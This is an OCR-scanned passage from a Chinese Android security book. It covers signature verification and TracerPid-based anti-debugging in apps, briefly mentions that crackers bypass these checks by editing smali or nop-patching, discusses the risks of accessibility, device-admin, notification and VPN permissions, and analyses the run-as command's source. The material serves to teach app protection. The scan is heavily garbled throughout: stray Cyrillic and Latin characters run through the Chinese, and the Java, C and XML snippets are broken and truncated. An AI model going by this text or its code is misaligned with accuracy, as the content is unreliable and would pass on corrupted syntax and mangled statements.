f**k 通过 返回 的 包 信 息 狂 得 签名 数组 *******/ 
Signature[] signatures = packageInfo.signatures; 
/*xxxxxx 循环 遍历 签名 数组 拼接 应 用 签名 xxxxxxx/ 
StringBuilder builder = new StringBuilder(); 
for (Signature signature : signatures) { 
builder.append(signature.toCharsString()); 
ОРГОН 得 到 应 用 签名 * * * * * k КК КЖ Ж / 
return builder.toString(); 
) catch (PackageManager.NameNotFoundException e) { 
e.printStackTrace(); 


} 
return ""; 
} 
ublic static boolean isOwnA i: Tp 
i Stering SEZoónsSLr = ———— 每 个 应 用 使 用 了 一 个 签名 文件 进行 
i Af Af =Й: n x ЕН T 
return APP SIGN.equals(signStr); 签名 ， A 4 [He ME HJ, 在 这 里 可 
) 进行 比较 ， 防 止 重 签名 


这 里 定义 一 个 简单 的 工具 类 用 于 比较 应 用 的 签名 ， 只 是 简单 处 理 ， 正 单 情况 下 这 里 应 该 比 对 签名 的 MD5 值 ， 为 了 简单 就 忽 
略 了 ， 然 后 在 程序 的 入 口 处 做 一 次 比 对 ， 如 果 不 正确 就 退出 程序 如 下 所 示 。 

@verride 

public void onCreate() | 


super.onCreate(); 


mContext = this.getApplicationContext(): 


boolean isOwnApp = Utils.isOwnApp(); 


Log.i("jw", "isownapp:"-«isOwnApp); 
if(!isOwnApp)( | 
Log.i("jw", "is not own app...exit app"); 在 这 里 如 果 发 现 


android.os.Process.killProcess(android.os.Process.myPid()); 签名 不 对 ， 就 立 
即 退 出 程序 


得 到 上 面 的 apk 之 后 ， 下 面 来 反 编 译 ， 重 新 签名 安装 (关于 这 里 如 何 反 编译 和 签名 ， 不 做 解释 了 ， 使 用 apktool 和 jarsigner 
工具 即 可 ， 签 名 文件 是 自己 的 ) ， 然 后 运行 如 下 所 示 : 


C:NUsersNjiangweil-g>adb logcat -s jw 

一 一 一 一 一 一 一 一 一 beginning of /dev/log/main 

一 一 一 一 一 一 一 一 一 beginning of /dev/log/system 

I/jw (28462): isownapp:false 

I/jw (28462): is not own app...exit app 


БРАНА 772, AMAR, СЕВИБ] T ВЕЛИ SS 141162. 


但 是 这 也 不 是 最 安全 的 ， 因 为 既然 有 签名 比 对 方法 的 地 方 ， 那 么 只 需要 反 编 译 apk 之 后 ， 修 改 smali 语 法 ， 把 这 个 方法 调用 
的 地 万 注释 即 可 ， 如 下 所 示 : 
# virtual methods 


.method public onCreate()V 
.locals 4 


.prologue 
.line 16 
invoke-super {p0}, Landroid/app/Application;-»onCreate()V 


. line 17 
invoke-virtual {p0}, Lcn/wjdiankong/encryptdemo/MyApplication;-»getApplicati 


move-result-object v1 


sput-object vl, Lcn/wjdiankong/encryptdemo/MyApplication;-»mContext:Landroid 


move-result vO 


.line 20 
.local vO, isOwnApp:Z 
const-string v1, "jw" 


На ВНЕР КАРЕ, ЯЕ ЕТ Ес Ве, IxEBBSMERUERD ЕЛ 5549065, ВЈ 
程序 在 native 层 做 的 ， 但 是 不 管 在 哪里 ， 只 要 是 在 代码 中 ， 融 可 以 找 出 来 的 。 


84 Би 


反 调 试 检测 是 为 了 应 对 现在 很 多 破解 者 使 用 IDA 进 行动 态 方 式 调 试 so 文 件 ， 从 而 获取 重要 的 信息 ， 知 道 1DA 进 行 so 动态 调试 
是 基于 进程 的 注入 技术 ， 然 后 使 用 Linux 中 的 ptrace 机 制 ， 进 行 调试 目标 进程 的 附加 操作 。ptrace 机 制 有 一 个 特点 ， 如 果 一 个 进 
程 被 调试 了 ， 在 它 进 程 的 status 文 件 中 有 一 个 字段 TracerPid 会 记录 调试 者 的 进程 id 值 ， 如 图 8-5 所 示 。 


С: NIsers"Jlangueil-g>adh shell 
shellBpisces:/Z Š ps igrep com.example.simpleencruptian 
ий_а114 535 18087 893272 56060B ffffffff WHBBBBBBB t com.examnple.simpleencruption 
shellÜ&pisces:^/ $ cat /proc/535/status 
inpleencryption 
t &tracing stop? 
535 


535 ЖЕҢДЕН) pid 
x 


10 10114 19114 10114 10114 
Gid: 18114 180114 18114 18114 
FDSize: 256 
Groups: 50114 
UnPeak: 895816 kB 
UmS ize: 892984 КВ 
UnLck: ñ kB 
UnPin: B kB 
UmHWM: 56188 kB 
UmRSS : 56868 kB 
UnData: 18784 kB 
UnStk: 136 kB 
UmExe : 8 kB 
UnLib: 48376 kB 
UmnPTE: 146 kB 
UmSwap: И kB 
Threads: 13 
5igQ: B715616 


图 8-5  TracerPid Ek 


查看 文件 : /proc/[mypPid]/status， 在 第 六 行 ， 有 一 个 TracerPid 字 段 ， 就 是 记录 了 调试 者 的 进程 jd。 那么 就 可 以 这 么 做 来 
达到 反 调 试 的 功效 了 : 轮 询 志 历 目 己 进程 的 status 文 件 ， 然 后 读 取 TracerPid 字 段 值 ， 如 果 友 现 它 大 于 0， 融 代表 着 目 己 的 应 用 在 
馈 人 调试 ， 所 以 束 立 号 退出 程序 。 原 理 知道 了 ， 代 码 实 现 也 很 简单 ， 这 里 用 pthread 创 建 一 个 线程 ， 然 后 进行 轮 询 操作 : 


使 用 pthread _create 创 建 一 个 线程 ， 线 程 启动 之 后 执行 thread_function 函 数 : 


int err = pthread create[&t id,INULL, thread fuction,| NULL); 
if(err != 0) Í 
LOGD( create thread fal: T Mum 
| 线程 id 线程 启动 之 后 执行 的 函数 
| 指针 ， 类 似 于 Java 中 的 
run 方法 吧 


看 看 thread їипсаїїоп&#й: 


void Ж 


int pid = getpid(); 
char file o E = {\0}; BER status 文件 


char linestrl256]; 
їпї 1=0, 1гасе14; 
FILE *їр; 
while(1)1 

1 = 0; 

fp = fopen(file name, r ): 

if (fp = NULL) í 
| n TracerPid 字段 是 在 第 六 行 
while(!feof(fp))( 
fgets эллез; 


if(traccid > 0t 


LOGD( I was be traced...trace pid:*d' ,traceid); 
exit(0): 


TEN 如 果 发 现 被 人 trace T, 
з1еер(5); | И, \/. Чо tH FE) 


3) 


开始 轮 询 ， 读 取 TracerPid 字 段 的 值 ， 发 现 大 于 0， 就 立马 退出 程序 。 运 行 结果 看 看 ， 如 下 所 示 : 


D/jW ( 9716): JNI on load... 

D/jW ( 9716): JNIEnv:0x417d7fe8 

D/jw ( 9716): start equal signature... 
D/jW ( 9716): class name:0xa6f00019 
D/jW ( 9716): check sign:0 

D/jW ( 9716): ёгасета: 0 

D/jw ( 9716): traceId:0 

D/jW ( 9716): traceId:0 

D/jW ( 9716): traceId:0 

D/jW ( 9716): traceId:0 

D/jW ( 9716): traceId:0 

D/jWw ( 9716): traceId:0 

D/jW ( 9716): ёгасета: 0 

D/jW ( 9716): tracelid:30382 

D/jw ( 9716): I was be traced...trace pid:30382 


看 到 了 ， 当 使 用 IDA 工 具 进 行 调 试 的 时 候 ， 程 序 立 马 退 出 ，IDA 的 调试 页 面 也 退出 了 。 


但 是 还 是 有 问题 ， 因 为 现在 破解 者 们 已 经 免 大 了 ， 知 道 会 有 这 种 检测 ， 所 以 融会 用 IDA 工 具 给 JNIL_OnLoad 函 数 下 断 点 ， 然 
后 进行 调试 ， 找 到 检测 轮 询 代码 ， 使 用 nop 指 令 ， 蔡 换 检 测 指令 ， 束 相当 于 把 检测 代码 给 注释 了 。 所 以 知道 的 人 多 了 ， 万 法 束 不 
好 用 了 。 


85 “本 章 小 结 


本 章 中 主要 介绍 了 在 Andtoid 中 开发 应 用 的 时 候 ， 可 以 从 几 个 方面 对 应 用 的 安全 做 一 层 防护 ， 主 要 介绍 了 以 下 几 种 方式 : 


` 使 用 Andtoid 中 的 混 消 机 制 ， 包 括 代 码 混 消 和 资源 混 消 ， 这 样 能 够 增加 反 编 译 之 后 的 内 容 阅 读 难 度 ， 同 时 可 以 减 小 应 用 包 
的 大 小 ° 


- 使 用 应 用 的 签名 保护 机 制 ， 因 为 每 个 应 用 的 签名 都 是 唯一 的 ， 为 了 防止 被 破解 ， 可 以 在 核心 的 方法 或 者 程序 入 口 处 添加 签 
名 校 验 功 能 ， 如 果 校 验 失败 就 可 以 直接 退出 程序 ， 增 加 破解 难度 。 


| 手动 注册 native 方 法 ， 这 个 方法 也 算是 一 种 混 清 机 制 ， 为 Andtoid 中 hative 方 法 在 hative 层 对 应 的 方法 名 都 有 固定 的 格式 ， 
为 了 防止 被 破解 ， 可 以 去 混淆 这 种 方法 的 命名 格式 来 增加 破解 难度 。 


` 增加 应 用 的 反 调 试 功 能 ， 这 里 借助 一 个 知识 点 ， 如 果 一 个 进程 被 注入 或 者 是 调试 了 ， 那 么 在 它 的 status 文 件 中 的 TracerPid 
字段 的 值 就 不 为 0。 可 以 借助 这 个 知识 点 来 增加 反 调 试 功 能 。 


第 9 章 Androlid 中 弟 用 权限 分 析 


Android 在 开发 过 程 中 会 申请 一 些 权限 ， 比 如 定位 、 网 络 等 关系 到 用 户 隐 私 数据 的 都 需要 在 AndroidManifest,xml 中 声明 ， 而 且 
现在 移动 设备 生产 商都 添加 了 应 用 在 使 用 这 些 隐私 功能 的 时 候 给 用 户 一 个 提示 ， 让 用 户 去 决定 是 否 允 许 本 次 操作 。Android 6.0 新 


了 这 个 功能 ， 叫 做 运行 时 权限 。 本 章 不 介绍 在 AndroidManifest.xml 中 申请 基础 权限 ,而 是 介绍 在 授权 页 面 申请 权限 ， 现 在 开发 
者 会 利用 这 些 权 限 去 开发 用 户 体验 不 错 的 产品 ， 在 这 个 过 程 中 会 产生 一 些 隐私 安全 问题 。 


у?, 
增 


9.1 辅助 功能 权限 


许多 Android 使 用 者 因为 各 种 情况 导致 需要 以 特殊 方式 与 手机 交互 。 例 如 有 举 用 户 由 于 视力 上 、 喘 体 上 、 年 龄 上 的 问题 致使 
他 们 不 能 看 完整 的 屏幕 、 使 用 触 屏 ， 或 者 无 法 很 好 地 接收 到 语音 信息 。 


Android 提 供 了 辅助 (Accessibility) 功能 和 服务 帮助 这 些 用 户 更 加 简单 地 操作 设备 ， 包 括 文 字 转 语音 (不 支持 中 文 ) üt 
涡 反 饶 、 手 势 操 作 、 轨 迹 球 和 手柄 操作 。 辅 助 功能 实质 上 惑 是 监听 应 用 窗口 变化 和 事件 。 在 使 用 辅助 功能 的 时 候 必 须 声 明 以 下 权 
限 : 


<application> 
«service android:name-".MyAccessibilityService" 
android:label-"G8string/accessibility service label"-» 
«intent-filter» 
«action android:name-"android.accessibilityservice.AccessibilityService" /> 
«/intent-filter» 
-/service» 
«uses-permission android:name-"android.permission.BIND ACCESSIBILITY SERVICE" /> 
-/application» 


在 代码 中 直接 打开 相应 的 Intent 跳 转 到 授权 页 面 : 


Intent accIntent = new Intent(Settings.ACTION ACCESSIBILITY SETTINGS); 
startActivity(accIntent); 


FRR: ЗРАЗИ, MAN, НИЕ AIEEE. 


辅助 功能 授权 页 面 如 图 9-1 所 示 。 


中 9) 10:08 上 午 


< 辅助 功能 


) 
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q 


图 9-1 辅助 功能 授权 页 面 


仔 任 的 风险 : 可 以 监听 设备 当前 的 窗口 变化 ,分析 当 前 应 用 的 View 结 构 之 后 模拟 点 击 。 比 如 一 个 恶意 的 软件 申请 到 了 这 个 
权限 之 后 ， 融 可 以 监听 设备 的 应 用 局 动情 况 : 


- 模拟 一 些 社交 App 的 登录 窗口 页 面 ， 其 实 是 他 们 自己 的 钓鱼 登录 页 ， 这 样 用 户 是 无 感知 的 ， 当 用 户 输入 用 户 名 和 和 窗 码 时 就 
16157. 


- 当 监 听 到 当前 应 用 是 社交 Appb， 而 且 是 聊天 记录 页 面 时 ， 就 可 以 得 知 当 前 聊天 记录 。 


:分析 设备 中 的 应 用 情况 ， 在 用 户 不 知情 的 情况 下 ， 模 拟 点 击 任何 一 个 应 用 进行 操作 ， 从 而 获取 信息 。 


92 ”设备 管理 权限 


在 开 友 的 过 程 中 ， 很 多 开 皮 者 没有 注意 到 设备 管理 权限 ， 它 的 作用 类 似 于 iPhone 中 的 “至 找 我 的 手机 ”功能 ， 当 设备 丢失 
的 时 候 ， 可 以 快速 定位 以 及 探 除 设备 数据 等 ， 在 使 用 这 个 功能 时 需要 申请 以 下 权限 : 


<receiver Android:name=".deviceAdminReceiver" 
android:label-"Gstring/app name" 
android:description-"Gstring/description" 
android:permission-"android.permission.BIND DEVICE ADMIN"-» 
«meta-data android:name-"android.app.device admin" 
android:resource-"üxml/device admin" /> 
«intent-filter» 
«action Android:name-"android.app.action.DEVICE ADMIN ENABLED" /> 
-/intent-filter» 
-/receiver» 


在 代码 中 直接 打开 相应 的 Intent 跳 转 到 授权 页 面 : 


Intent adminIntent = new Intent( 
DevicePolicyManager.ACTION ADD DEVICE ADMIN); 
adminliIntent.putExtra(DevicePolicyManager.EXTRA DEVICE ADMIN, 
getComponentName()); 
adminlIntent.putExtra(DevicePolicyManager.EXTRA ADD EXPLANATION, "aaa"); 
startActivityForResult(adminlIntent, 0); 


RAE ENRETA — NRHA, Жен АУЕ ЕП. АУЛА GBJAppZUZSSFBF EE, БЈН“ 
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授权 页 面 如 图 9-2 所 示 。 
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要 激活 设备 管理 器 吗 ? 


激活 此 管理 РВ" ВЕЛИ ВЯ" ИУ 


LA FEE: 


H9-2 ”设备 管理 授权 页 面 


仔 企 的 风险 : 申请 这 个 权限 之 后 ， 有 一 个 很 大 的 弊 疹 融 是 设备 相当 于 给 申请 者 管理 了 ， 他 们 可 以 修改 设备 的 锁 屏 密码 、 探 除 
数据 等 ， 这 对 于 用 户 来 说 是 很 危险 的 。 


93 ”通栏 管理 权限 


通知 栏 管 理 权限 算是 辅助 功能 的 一 个 缩减 版 ， 因 为 辅助 功能 是 可 以 监听 设备 的 通知 栏 情况 的 ， 而 这 个 功能 专门 用 来 监听 设备 
的 通知 栏 消 息 。 在 使 用 的 过 程 中 需要 申请 下 面 的 权限 : 


«service android:name=" .NotificationListener" 


android:label-"Gstring/service name" 
android:permission-"android.permission.BIND NOTIFICATION LISTENER, SERVICE"» 


«intent-filter» 
«action android:name-"android.service.notification.NotificationListenerService"/- 


«/intent-filter» 


c«/service» 


在 代码 中 直接 打开 相应 的 Intent 跳 转 到 授权 页 面 : 


Intent notifyIntent = new Intent(Settings.ACTION NOTIFICATION LISTENER, SETTINGS); 


startActivity(notifyIntent); 


FEHR. EUESBDSAdER, ОЈЛЕРА АВИВ, 


授权 页 面 如 图 9-3 所 示 。 
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《 ”通知 读 取 权限 
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9-3 ”通知 栏 管理 授权 页 面 


仔 任 的 风险 : 与 辅助 功能 一 样 ， 申 请 这 个 权限 乙 后 用 户 设 备 的 通知 栏 消息 融会 银 它 接管 ， 如 果 通 知 栏 有 敏感 消息 的 话 ， 对 用 
尸 来 说 是 很 危险 的 。 


94 ”VPN 开发 权限 


Android 4.0 之 后 增加 了 VPN 功 能 ,开发 者 可 以 使 用 VpnService 来 开 友 VPN 相 关 的 功能 。 在 使 用 的 过 程 中 ， 需 要 申请 权限 ， 
如 下 所 示 : 


«service android:name=" .ExampleVpnService" 


android:permission-"android.permission.BIND VPN_SERVICE"> 
«intent-filter» 


«action android:name-"android.net.VpnService"/-» 
-/intent-filter» 
-/service» 


在 代码 中 直接 打开 相应 的 Intent 跳 转 到 授权 页 面 : 


Intent vpnIntent = VpnService.prepare(getApplicationContext()); 
startActivityForResult (vpnIntent, 0); 


授权 页 面 如 图 9-4 所 示 。 


AndroidDemo?E 275 E МЕ Ж 
( 可 被 用 于 监控 网 络 流量 ) 。 请 只 : 

您 信任 该 来 源 的 情况 下 才 接 受 此 请 
求 。 在 VPN 处 于 活动 状态 时 ， 您 的 屏 
ЭЕ зар 


Or Ef. 


99-4 ”VPN 授权 页 面 


开发 场景 : Android 中 VPN 软 件 开 发 ， 可 以 免 root 管 理 设备 中 的 应 用 联网 。 


人 存在 的 风险 : 如 果 申 请 了 这 个 权限 ， 就 代表 这 个 设备 的 网 络 访问 消息 会 被 申请 者 接管 ， 网 络 访问 消息 的 重要 性 不 言 而 喻 。 


95 ”本 童 小 结 


本 章 主 要 介绍 了 Android 中 一 些 第 用 的 特殊 权限 ， 现 在 的 开发 者 可 以 利用 这 些 权 限 开发 出 体验 很 好 的 产品 ， 但 是 也 会 有 一 些 
潜在 的 风险 。 所 以 在 开发 过 程 中 如 果 用 到 这 几 个 权限 的 话 ， 还 是 需要 慎重 。 设 备 使 用 者 在 遇 到 这 些 权 限 安 全 提示 的 时 候 也 要 额外 


TA 


第 10 章 Android 中 的 run-as 命 令 


它 有 一 个 限制 ， 就 是 必须 携带 指定 应 用 包 名 


Andtoid 中 有 一 个 tun-as 命 令 ， 这 个 命令 的 作用 是 可 以 用 toot 身 份 运行 命令 ， 但 是 
自己 应 用 的 沙 盒 数 据 ， 在 设备 没有 toot 的 情况 下 ， 可 以 使 用 这 


且 这 个 应 用 是 debug 模 式 的 ， 也 就 是 说 ， 如 果 在 开发 中 想 看 
查看 。 本 章 将 分 析 这 个 命令 及 使 用 方法 。 


> 
Бү 


10.1 命令 分 析 和 和 使 用 


以 前 想 看 一 个 应 用 的 沙 使 数据 (/data/data/xxx/ 目 录 内 容 ) ， 一 般 都 是 选择 root 之 后 去 查看 对 应 的 数据 库 、XML 等 数据 。 
但 是 如 果 没 有 root 了 也 想 看 这 些 数 据 ， 怎 么 办 呢 ?Android 中 提供 了 一 个 命令 ， 那 束 是 run-as， 不 过 这 个 命令 有 一 个 缺陷 ， 残 是 


只 有 debug 模 式 应 用 才能 被 查看 。 


命令 的 用 法 很 简单 : run-as[packagename]。 其 中 packagename 束 是 想 查 看 的 应 用 的 包 名 ， 运 行 命令 之 后 ， 束 直接 进入 
指定 应 用 的 目录 : /data/data/packagename/。 


现在 稍微 了 解 了 Android 中 有 这 个 命令 可 以 查看 debug 应 用 的 沙 盒 数 据 ， 但 直接 运行 会 遇 到 问题 ， 运 行 结果 如 下 所 示 : 


C:\Users\jiangweil-g>adb shell 
shell@pisces:/ S run-as demo.systemapi 
run-as: Package 'demo.systemapi' is unknown 
11ѕһе11@ріѕсеѕ:/ $ 


为 什么 这 个 命令 会 报销 呢 ?” 遇 到 这 个 情况 有 两 种 方式 解决 : 一 种 是 网 上 得 资料 ， 一 种 是 自己 去 看 源 代 码 。 为 了 问题 解决 的 高 
效 性 ， 就 去 看 源码 吧 。Android 中 的 命令 一 般 都 在 /system/bin 和 /system/xbin 目 录 下 ， 这 些 命令 的 源码 都 是 放 在 Android 源 人 码 
目录 /system/core/ 下 ， 如 图 10-1 所 示 。 


| libsysutils 2012/12/11 

Jl libusbhost 2012/12/1 17:55 
国 libzipfile 2012/12/1 17:55 
j logcat 2012/12/1 17:55 
Ji logwrapper 2012/12/1 17:55 
Ji mkbootimg 2012/12/1 17:55 


Ji netcfg 2012/12/1 17:55 
ji rootdir ”这 里 的 重点 2012/12/1 17:55 
run-as| ` 2012/12/1 17:55 
Ji sdcard 2012/12/1 17:55 
j: sh 2012/12/1 17:55 


0 toolbox |” 传说 中 的 toolbox 2012/12/1 17:55 


图 10-1 tun-as 命 令 源码 的 位 置 


run-as 的 源码 如 图 10-2 所 示 。 


int main(int argc, char **argv) 


const char* pkgname; 
int myuid, uid, gid; 
PackagelInfo info; 


/* check arguments */ 这 里 做 一 次 检查 ， 这 个 命令 只 


aie > A 能 是 shell 和 root 用 户 才 能 执行 


usage(); 


/* check userid of caller - must be 'shell' or 'root' */ 
myuid = getuid(); 
if (myuid != AID SHELL && myuid != AID ROOT) í 


panic("only 'shell' or 'root' users can run this ргоргат\п"); 


pkename = argv[1]; | 这 里 是 匹配 需要 查看 的 应 用 的 包 信 息 ， 后 面 再 分 
1 t 1 » 1 ө `x 4. n PRAE * E31 IY m 
| purapa qaa Lic л RPE Н 74 Er ` 我 们 可 以 看 到 我 们 遇 到 的 错误 就 是 这 个 
| return 1; http: //blog. csdn]net/ 
这 里 用 来 判断 uid 不 能 小 于 AID_APP 的 ， 

/* reject system packages */ AID APP-10000, 我 们 也 知道 一 般 Android 中 
if (info.uid < AID APP) { еи | 
| жыш a 'Xs' is not an application\n", pkgname); 的 Ee JV uid WIE 10000 的 ， A AR 

Midas 于 这 个 值 ， 那 么 就 认为 不 是 一 个 应 用 了 
/* reject any non-debuggable package */ 这 里 又 是 一 个 重点 ， 只 有 应 用 是 debug 模式 
E anic packas: "Xs" is not debuggable\n", ркепаве); | 才能 运行 这 个 命令 ， 所 以 开始 的 时 候 我 们 说 

过 ， 只 有 debug 模式 才能 查看 对 应 应 用 的 数据 


return 1; 


检查 对 应 应 用 的 数据 路 径 的 合法 性 


图 10-2 ftun-as 源 码 分 析 (一 ) 


看 到 这 里 ， 原 来 run-as 命 令 运 行 是 有 很 多 限制 的 。 下 面 分 别 介 


第 一 个 限制 : 运行 的 uid 限 制 


运行 命令 的 用 户 id 只 能 是 shell 和 root 用 户 。 下 面 可 以 验证 一 下 ， 使 用 system 的 uid 运 行 命令 : 


1|5һе11@ріѕсеѕ:/ S su 1000 

system@pisces:/ S run-as demo.systemapi 

k shell/2000:27937: run-as: can't execute: Permission denied 
126|systemQOpisces:/ $ 


这 里 用 于 测试 的 设备 已 经 root 了 。 看 到 使 用 su 可 以 随意 设 定 uid， 这 里 将 uid 变 成 了 system ， 有 再 运行 run-as 友 现 报错 了 


合 预期 吧 ? 


第 二 个 限制 : MARRUA A 


这 里 再 仔细 看 看 get_package_info 这 个 函数 的 源码 ， 它 位 于 run-as.c 同 目录 下 的 package.c， 如 图 10-3 所 示 。 


这 里 通过 map file 函 数 来 获取 PACKAGES_LIST_FILE 文 件 的 buffer 内 容 ， 再 来 看 一 下 PACKAGES_LIST_FILE 的 定义 : 


/* The file containing the list of installed packages оп the system */ 
#define PACKAGES, LIST FILE  "/data/system/packages.list" 


/* Read the system's package database and extract information about 
* 'pkgname'. Return 0 in case of success, or -1 in case of error. 


* If the package is unknown, return -1 and set errno to ENOENT 
* If the package database is corrupted, return -1 and set errno to EINVAL 


е 
int 
get package infd(const char* pkgName, PackagelInfo *info) 
{ 
сһаг* buffer; 
size t buffer len; 


const char* p; 
const char* buffer end; 


int result - -1; 

info-»uid - 6; 这 里 会 读 取 /data/system/ 
info-»isDebuggable = Ө; 7X 
info-»dataDir[0] = "W@`- yx package.list 文件 内 容 


buffer = map_file(PACKAGES_LIST_FILE, &buffer_len); 


if (buffer == NULL) 
return > 


р = buffer; 
buffer end = buffer + buffer len; 


图 10-3 ”run-as 源 码 分 析 (二 ) 


导出 这 个 文件 ， 但 看 内 容 : 


E 


com.android.apps.tag 10028 @ /data/data/com.android.apps.tag release none 
demo.systemapi 10100 1 /data/data/demo.systemapi default none 
com.shuame.sprite 10101 0 /data/data/com.shuame.sprite default 3003,1028,1015 


这 个 文件 记录 所 有 安 妆 应 用 的 信息 : 包 名 ， 用 户 id (uid) ， 是 否 为 debug 模 式 ， 对 应 的 数据 目录 ， 是 否 是 release 版 ， 组 
id (gid) 。 这 里 发 现 demo.systemapi 应 用 是 debug 模 式 的 。 一 般 正 式 App 都 是 非 debug 模 式 。 


通过 读 取 这 些 信息 束 可 以 构造 出 一 个 Packagelnfo 了 ， 如 图 10-4 所 示 。 


while (p < buffer end) { 
/* find end of current line and start of next one */ 
const char* end = find first(p, buffer end, 'Mn'); 
const char* next = (end « buffer end) ? end + 1 : buffer end; 
const char* q; 
int uid, debugFlag; 


/* first field is the package name */  ,, n "PM 
p = compare name(p, end, pkgName); ”这 里 我 们 看 到 是 通过 解 
if (p == NULL) 


goto NEXT LINE; № package. list X 件 来 F 4] 造 
el РОДИ 对 应 包 名 应 用 的 信息 


if (parse spaces(&p, end) < 0) 
goto BAD FORMAT; 


/* second field 15 the pid */ 
uid = parse positive decimal(&p, end); 
if (uid < ө) 


return -1; 
info-»uid - (uid t) uid; 
/* skip spaces */ 


if (parse spaces(&p, end) < 0) debug 标识 
goto BAD FORMAT; 


/* third field 15 debug flag (0 or 1) */ 
debugFlag = parse positive decimal(&p, end); 
switch (debugFlag) í 
case Ө: 

info-»isDebuggable 

break; 


case 1: 
info-»isDebuggable 
break; 

default: 
goto BAD FORMAT ; 


图 10-4 frun-as 源 码 分 析 (=) 


注意 ， 这 里 看 到 了 packages.list 文 件 是 存储 安 濠 包 的 简略 信息 ， 和 它 同一 目录 下 还 有 一 个 重要 文件 packages.xml， 可 以 导 
出 来 看 看 ， 如 下 所 示 : 


«package name-"demo.systemapi" codePath-"/data/app/demo.systemapi-1.apk" nativeLil 
15570fdb3b1" version-"1" userId-"10112" installer-"adb"» 
«sigs count-"1"» 
«cert index-"14" /» 
«/sigs» 
«perms /» 
«signing-keyset identifier-"2" /» 
«/package» 
«package name-"com.android.systemui" codePath-"/system/priv-app/MiuiSystemUI. арк" 
ut-"1556cfe19c0" version-"19" sharedUserId-"1000"» 
«sigs count-"1"» 
«cert index-"09" /> 
«/sigs» 
«signing-keyset identifier-"1" /» 
«/package» 
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的 ， 还 有 签名 信息 、 权 限 等 。 


当然 可 以 使 用 Android 中 的 dumpsys packageinfo 命 令 来 可 看 指定 应 用 的 详细 信息 ， 如 下 所 示 : 


C:NUsersNjiangweil-g>adb shell 
shell@pisces:/ S dumpsys package demo.systemapi 
Activity Resolver Table: 
Non-Data Actions: 
android.intent.action.MAIN: 
43a735e0 demo.systemapi/.MainActivity filter 43c4e698 
Action: "android.intent.action.MAIN" 
Category: "android.intent.category.LAUNCHER" 


Key Set Manager: 
[demo.systemapi] 
Signing KeySets: 29 


Packages: 
Package [demo.systemapi] (43749368): 

userlId-10100 gids-[] 
рка=Раскаде{ 43901748 demo.systemapi] 
codePath-/data/app/demo.systemapi-1.apk 
resourcePath-/data/app/demo.systemapi-1l.apk 
nativeLibraryPath-/data/app-lib/demo.systemapi-1 
versionCode-1 targetSdk-21 
versionName-1.0 
applicationlInfo-ApplicationInfo(439p1888 demo.systemapi]) 
flags-[ DEBUGGABLE HAS CODE ALLOW CLEAR, USER DATA ALLOW BACKUP 
dataDir-/data/data/demo.systemapi 


过 这 个 


] 


信息 来 获取 


supportsScreens=[small, medium, large, xlarge, resizeable, anyDensity] 


timeStamp=2016-06-21 13:37:02 
firstImstallTime=2016-06-21 13:37:02 
lastUpdateTime-2016-06-21 13:37:02 
installerPackageName-adb 
signatures-PackageSignaturesí436d91c8 [4375ebc8]) 
permissionsFixed-true haveGids-true installStatus-1 


pkgFlags-[ DEBUGGABLE HAS CODE ALLOW CLEAR USER DATA ALLOW BACKUP | 
User 0: installed-true blocked-false stopped-false notLaunched-false 


enabled-0 
ѕһе11@ріѕсеѕ:/ $ 


第 三 个 限制 : 应 用 的 uid 必 须 合 ; 


如 
权 。 


~ 


对 于 查看 的 应 用 的 uid 也 是 有 相应 限制 的 ， 如 下 所 示 : 
/* reject system packages */ 
if (info.uid < AID APP) { 


panic ("Package '$s' is not an applicationWn", pkgname); 
return 1; 


这 里 AID APPRSsE МХҒАпагоіа 5 E 3e NsystemNcoreNincludeMprivateNandroid filesystem config.h 下 。 
定义 了 一 些 uid 信 息 ， 例 如 : 

- AID ROOT 对 应 的 是 root 用 户 ，uid=0。 

- AID_SYSTEM 对 应 的 是 system 用 户 ，uid=1000。 

- AID SHEIL 对 应 的 是 shell 用 户 ，uid=2000。 
可 以 看 到 ，root 用 户 的 权限 > system 用 户 的 权限 > shell 用 户 的 权限 > 第 三 方 应 用 的 权限 。 


不 过 这 里 所 襄 的 权限 只 是 针对 一 些 情 况 ， 不 是 全 部 。Android 中 有 些 API 会 做 uid 限 制 ， 即 使 用 反射 机 制 也 是 访问 失败 的 ， 比 
一 个 API 限 制 只 能 uid=1000 的 用 户 即 system 用 户 才 能 调用 ， 那 么 这 时 你 是 root 用 户 也 是 没 办 法 的 ， 不 过 可 以 使 用 su 进行 降 


这 三 个 用 户 的 id 最 好 记 住 ， 算 是 单 识 ， 如 下 代码 有 详细 定义 : 


define AID ROOT 0 /* traditional unix root user */ 
#define AID SYSTEM /* System server */ 

#define AID RADIO 1001 /* telephony subsystem, RIL */ 
#define AID BLUETOOTH 1002 /* bluetooth subsystem */ 

#define AID GRAPHICS 1003 /* graphics devices */ 

define AID INPUT 1004 /* input devices */ 

define AID AUDIO 1005 /* audio devices */ 

#define AID CAMERA 1006 /* camera devices */ 

define AID LOG 1007 /* log devices */ 

#define AID COMPASS 1008 /* compass device */ 

define AID MOUNT 1009 /* mountd socket */ 

define AID WIFI 1010 /* wifi subsystem */ 

define AID ADB 1011 /* android debug bridge (аара) */ 
tdefine AID INSTALL 1012 /* group for installing packages */ 
#аеҒіпе AID MEDIA 1013 /* mediaserver process */ 

define AID DHCP 1014 /* dhcp client */ 

#define AID SDCARD RW 1015 /* external storage write access */ 
define AID VPN 1016 /* vpn system */ 

tdefine AID KEYSTORE 1017 /* keystore subsystem */ 

#define AID USB 1018 /* USB devices */ 

#define AID DRM 1019 /* DRM server */ 

tdefine AID MDNSR 1020 /* MulticastDNSResponder (service discovery) */ 
define AID GPS 1021 /* GPS daemon */ 

#define AID UNUSED]1 1022 /* deprecated, DO NOT USE */ 


#define AID MEDIA RW 1023 /* internal media storage write access */ 


#define AID MTP 1024 /* MTP USB driver access */ 


tdefine AID UNUSED2 1025 /* deprecated, DO NOT USE */ 

define AID DRMRPC 1026 /* group for drm тре */ 

#define AID NFC 1027 /* nfc subsystem */ 

#define AID SDCARD R 1028 /* external storage read access */ 
#define AID SHELL 2000 /* adb and debug shell user */ 
#define AID CACHE 2001 /* cache access */ 

#define AID DIAG 2002 /* access to diagnostic resources */ 


再 往 下 看 ， 第 三 方 应 用 uid 的 定义 如 下 所 示 : 

#define AID APP 10000 /* first app user */ 

这 里 的 AID_APP 是 10000， 安 委 的 应 用 的 uid 都 是 从 10000 开 始 的 ， 所 以 uid 都 是 大 于 10000 的 ， 代 码 中 做 了 一 层 uid 的 合法 
性 判断 限制 。 

注意 : 一 般 查 看 应 用 的 uid 时 ， 得 到 最 后 的 整数 +10000 就 是 应 用 的 uid， 比 如 demo.systemapi 的 uid 就 是 : 10000+100=10100。 

